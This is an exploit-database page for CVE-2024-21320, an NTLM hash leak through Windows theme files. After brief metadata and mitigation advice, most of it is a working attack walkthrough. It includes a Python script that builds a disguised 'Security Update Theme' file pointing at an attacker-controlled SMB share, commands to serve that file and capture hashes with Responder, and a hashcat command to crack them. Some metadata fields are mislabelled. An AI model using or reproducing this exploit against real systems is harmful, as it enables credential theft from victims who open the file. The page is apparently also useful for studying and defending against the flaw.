CVE-2024-21320 - NTLM Hash Leak via Malicious Windows Theme

vendor:

Windows

by:

Abinesh Kamal K U

6.1

CVSS

HIGH

NTLM Hash Leak

522

CWE

Product Name: Windows

Affected Version From: Not specified

Affected Version To: Not specified

Patch Exists: NO

Related CWE: CVE-2024-21320

CPE: Not specified

Metasploit:

Other Scripts:

Platforms Tested: Windows

2025

CVE-2024-21320 – NTLM Hash Leak via Malicious Windows Theme

The exploit involves creating a malicious Windows theme file that contains a link to an attacker-controlled SMB server. When the victim opens this theme file, their NTLM hash is captured by the attacker. This vulnerability is identified as CVE-2024-21320.

Mitigation:

To mitigate this vulnerability, users should be cautious while downloading and opening theme files from untrusted sources. Organizations should also implement network segmentation and monitoring to detect suspicious activities.

Source

Exploit-DB raw data:

# Exploit Title: CVE-2024-21320 - NTLM Hash Leak via Malicious Windows Theme
# Date: 02/03/2025
# Exploit Author: Abinesh Kamal K U
# CVE : CVE-2024-21320
# Ref: https://www.cve.org/CVERecord?id=CVE-2024-21320


## Step 1: Install Responder
Responder is a tool to capture NTLM hashes over SMB.

git clone https://github.com/lgandx/Responder.git
cd Responder

Replace `eth0` with your network interface.


## Step 2: Create a Malicious Windows Theme File

### Python Script to Generate the Malicious `.theme` File

import os

# Attacker-controlled SMB server IP
attacker_smb_server = "192.168.1.100"  # Change this to your attacker's IP

# Name of the malicious theme file
theme_filename = "malicious.theme"

# Malicious .theme file content
theme_content = f"""
[Theme]
DisplayName=Security Update Theme

[Control Panel\Desktop]
Wallpaper=\\\\{attacker_smb_server}\\share\\malicious.jpg

[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Write the theme file
with open(theme_filename, "w") as theme_file:
    theme_file.write(theme_content)

print(f"[+] Malicious theme file '{theme_filename}' created.")

# Optional: Start a Python HTTP server to serve the malicious theme file
start_http = input("Start HTTP server to deliver theme file? (y/n):
").strip().lower()
if start_http == "y":
    print("[+] Starting HTTP server on port 8080...")
    os.system("python3 -m http.server 8080")
```


## Step 3: Deliver & Capture NTLM Hashes
1. Send the `malicious.theme` file to the target.
2. Run Responder to capture the NTLM hash:

   sudo python3 Responder.py -I eth0

3. Wait for the victim to open the `.theme` file.
4. Extract NTLM hash from Responder logs and crack it using hashcat:

   hashcat -m 5600 captured_hashes.txt rockyou.txt


-- 
Abinesh Kamal K U
abineshjerry.info
MTech - Cyber Security Systems & Networks
Amrita University